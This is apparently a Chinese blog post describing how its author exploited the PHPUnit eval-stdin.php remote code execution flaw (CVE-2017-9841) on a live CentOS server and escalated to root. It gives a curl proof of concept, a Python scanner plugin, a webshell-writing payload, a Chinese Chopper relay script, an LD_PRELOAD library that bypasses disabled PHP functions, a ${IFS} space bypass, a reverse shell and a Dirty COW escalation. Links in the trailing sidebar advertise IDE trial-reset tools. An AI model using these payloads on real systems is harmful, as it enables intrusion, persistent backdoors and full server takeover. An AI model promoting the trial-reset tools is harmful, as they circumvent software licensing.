eval stdin.php,CVE-2017-9841到root提权

最新推荐文章于 2021-12-24 21:35:15 发布
最新推荐文章于 2021-12-24 21:35:15 发布
阅读量2k 收藏
点赞数
文章标签: eval stdin.php

漏洞详情: http://phpunit.vulnbusters.com

简单来说漏洞是出在phpunit,可以使用composer安装,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, 这个文件可以造成RCE:

$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

影响版本: 4.8.19~4.8.27或者5.0.10~5.6.2

漏洞的利用扫描

官网给了一个poc,照着POC写一个POC-T的扫描插件:

#!/usr/bin/env python

# -*-coding: utf-8 -*-

import requests

req_timeout = 10

def poc(url):

if '://' not in url:

url = 'http://' + url

targeturl = url.rstrip('/') + "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

try:

c = requests.post(targeturl, timeout=req_timeout, data="<?php echo(pi());")

if r'3.14' in c.content:

return url

except Exception, e:

pass

return False

I

写个shell或者菜刀中转脚本

写shell

因为直接是RCE,如果当前目录可写,直接POST这样的body: <?php file_put_contents("a.php", '<?php eval($_REQUEST[11]);?>');即可在当前目录生成一个a.php的shell。如果当前目录不可写,可以使用菜刀中转脚本。

菜刀中转脚本

使用20160622版本的菜刀,可以直接连目标,可以执行命令,但是不可以上传修改文件。

$webshell="";

$data = file_get_contents("php://input");

$data=substr($data,1);

$data=str_replace("%2F",'/',$data);

$data=str_replace("%2B",'+',$data);

$data=str_replace("%3D",'=',$data);

$data= "<?php ". $data;

echo $data;

$opts = array (

'http' => array (

'method' => 'POST',

'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .

"Content-Length: " . strlen($data) . "\r\n",

'content' => $data)

);

$context = stream_context_create($opts);

$html = @file_get_contents($webshell, false, $context);

echo $html;

?>

通过上一步另外写一个shell,碰到的环境情况如下:

CentOS release 6.5 (Final)

2.6.32的内核,可以使用c0w提权

存在/home/wwwroot目录,推测使用了lnmp一键安装包

Linux的lnmp一键安装包把大部分可执行命令的函数都禁用了,但是可以通过LD_PRELOAD来执行命令:

//gcc -c -fPIC hack.c -o hack

//gcc -shared hack -o hack.so

#include

#include

#include

void payload() {

system("echo aaaaa> /tmp/abc.txt");

}

int geteuid() {

if (getenv("LD_PRELOAD") == NULL) { return 0; }

unsetenv("LD_PRELOAD");

payload();

}

使用方法:

putenv("LD_PRELOAD=/var/www/hack.so");

mail("a[@localhost](/user/localhost)","","","","");

?>

由于目标机器不可以执行命令,现在本机编译好之后上传即可,本机编译环境是:

CentOS Linux release 7.4.1708 (Core)

经测试,可以执行命令,但是如果命令存在空格,执行失败,所以这里是用${IFS}来绕过,经测试可用。先后做了如下的提权测试:

使用python来反弹shell到自己服务器,失败

把编译好的dirty上传,然后在hack.c里面修改执行提权,失败

由于每次要执行命令都要先本机编译,然后上传过去略麻烦,回过头发现可以执行python脚本,所以最后改下hack.c:

//hack.c

#include

#include

#include

void payload() {

system("/usr/bin/python${IFS}/tmp/1.py");

}

int geteuid() {

if (getenv("LD_PRELOAD") == NULL) { return 0; }

unsetenv("LD_PRELOAD");

payload();

}

#1.py

import os

os.system("netstat -plant >/tmp/res.txt")

这样子只需要每次修改1.py文件即可执行命令,不用再每次编译so文件。但是这样执行命令有一个缺陷,刷新一下执行命令的php文件,会不停的生成/usr/bin/python${IFS}/tmp/1.py进程,我测试的时候大概有4000多个进程。

然后修改1.py文件反弹到自己的服务器成功。

提权

在目标机器上面,直接使用gcc来编译c0w.c失败。

使用本机编译之后上传,在反弹的shell里面直接执行,提权成功。

weixin_39684235
关注
phpunit 远程代码执行漏洞(CVE-2017-9841eval-stdin.php
墨痕诉清风的博客
07-15 657
PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。
ide-eval-resetter-2.2.3-031813.zip
10-15
IDE-Eval-Resetter 是一个专门针对IDE的评估期重置工具,通常用于开发者在试用期结束后继续使用软件。版本号"2.2.3-031813"表示这是该工具的第2.2.3次更新,发布日期可能是2013年3月18日。这个工具主要解决的是IDE...
phpunit 远程代码执行漏洞(CVE-2017-9841
EC_Carrot的博客
07-21 749
漏洞详细 phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码: eval('?>'.file_get_contents('php://input')); 如果该文件被用户直接访问到,将造成远程代码执行漏洞。 漏洞复现 直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/
【威胁分析】phpunit远程代码执行漏洞
sinat_35058227的博客
08-29 3261
phpunit是php中的单元测试工具 其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 有一个eval eval('?>'.file_get_contents('php://input')); 直接将PHP代码作为POST Body发送 即可执行php代码 威胁分析: 1、分析是否利用该漏洞 uri为:/vendor/phpunit/phpunit/src/Util/PHP
8.5-练习
~airrudder~
08-06 608
目录SSRFSSRF扫描内网靶机SSRF攻击 Redis333333XXE漏洞XXE读取/flag和./flag.php无回显XXE读取/flagPHP代码执行Thinkphp5 代码执行phpunit代码执行1111 上一篇 | 目录 | 下一篇 SSRF http://10.20.25.44/: SSRF 扫描内网靶机 http://10.20.25.44:82/: SSRF攻击 Redis,redis 密码 root http://10.20.25.44:84/: SSRF攻击本地的 php.
phpunit 远程代码执行 (CVE-2017-9841)
YouthBelief的博客
11-04 3277
@[TOC](phpunit 远程代码执行 (CVE-2017-9841)) phpunit 远程代码执行 (CVE-2017-9841) PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架。 0x01 漏洞描述 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 80端口 漏洞位于 /vendor/p
ide-eval-resetter-2.3.5.zip
07-01
ide-eval-resetter-2.3.5-c80a1d.zipide-eval-resetter-2.3.5-c80a1d.zipide-eval-resetter-2.3.5-c80a1d.zipide-eval-resetter-2.3.5-c80a1d.zipide-eval-resetter-2.3.5-c80a1d.zipide-eval-resetter-2.3.5-c80a1d...
ide-eval-resetter-2.3.5-c80a1d.zip
11-15
标题中的"ide-eval-resetter-2.3.5-c80a1d.zip"表明这是一个软件插件的压缩包,版本号为2.3.5,特定的哈希值"c80a1d"可能用于验证文件的完整性。这个插件主要针对IDE(集成开发环境),特别是PyCharm,它是一款广泛...
ide-eval-resetter-2.1.9.jar
05-19
\ide-eval-resetter.zip\ide-eval-resetter\lib\ide-eval-resetter-2.1.9.jar
ide-eval-resetter-2.1.14.jar
04-28
ide-eval-resetter-2.1.14.jar
ide-eval-resetter-2.1.6.zip
12-29
标题中的“ide-eval-resetter-2.1.6.zip”是一个特定版本的插件,主要用于IDE(集成开发环境)的评估期重置。这个插件的版本号是2.1.6,通常版本号的更新意味着修复了之前版本的问题或增加了新功能。 描述中提到的...
ide-eval-resetter-2.1.14-d2fedb86.zip
04-25
IDE-Eval-Resetter是一个专为JetBrains系列集成开发环境(IDE)设计的工具,主要用于重置IDE的评估期,使用户能够在免费试用期结束后继续使用。版本2.1.14-d2fedb86是这个工具的一个特定更新,包含了修复和改进,以...
ide-eval-resetter-2.1.14.zip
05-21
这个版本2.1.14的压缩包包含了一个名为 "ide-eval-resetter" 的核心程序,它主要用于解决开发者在使用试用版IDE时遇到的评估期限制问题。 IDE(集成开发环境)是程序员进行软件开发的重要工具,如JetBrains的...
ide-eval-resetter-2.1.6非破解无限试用插件
06-17
一款IDEA好用的插件,适用于旗舰版,虽然只能使用三十天,不过三十天后可以重新配置使用。 可以无限延期
大商创去后门eval-stdin.php,大商创的开源代码都有哪些后门,如何去除大商创后门...
weixin_39733805的博客
03-23 823
大商创的开源代码中有很多后门,以方便官方监控系统的使用,官方做的真是无孔不入啊,我找到了下面几种。1、数据库表dsc_shop_config 中,code值为certi的记录。我们发现这就是大商创的后门地址了,那我们去代码中看看,大商创是怎么利用的这个地址的吧,我们全局搜索一下。搜索关键词:write_static_cache('seller_goods_str', $httpData);搜索结果...
Nginx配置错误
N的博客
12-24 1481
Nginx配置错误
phpunit 远程代码执行漏洞(CVE-2017-9841)复现
热门推荐
SoulCat
05-28 2万+
phpunit 远程代码执行漏洞(CVE-2017-9841)复现 上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。 漏洞概述: PHPUnit 是 PHP 程式语言中...
cve-2017-9841复现
最新发布
07-27
根据引用\[2\]和引用\[3\]的信息,CVE-2017-9841PHPUnit远程代码执行漏洞的一个漏洞编号。PHPUnit是PHP语言中最常见的单元测试框架,通常使用composer进行部署。如果在Web可访问目录中存在PHPUnit的编写器模块,就存在远程代码执行漏洞。该漏洞的版本范围是4.8.19至4.8.27和5.0.10至5.6.2。具体的原理是,在/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件中,通过eval函数执行了从php://input中获取的代码。然而,目前使用的PHPUnit版本一般为5.7或更高,几乎不存在这个漏洞的可能性。\[2\]\[3\] 如果您想复现CVE-2017-9841漏洞,您需要使用受影响版本的PHPUnit,并将编写器模块放置在Web可访问目录中。然后,您可以通过向php://input发送恶意代码来利用该漏洞。请注意,复现漏洞是违法行为,且可能会对系统造成损害。强烈建议您仅在合法的环境中进行安全测试和研究。 #### 引用[.reference_title] - *1* *3* [phpunit 远程代码执行漏洞(CVE-2017-9841)](https://blog.csdn.net/weixin_46203060/article/details/111489023)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [phpunit 远程代码执行漏洞(CVE-2017-9841)复现](https://blog.csdn.net/csacs/article/details/90640601)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值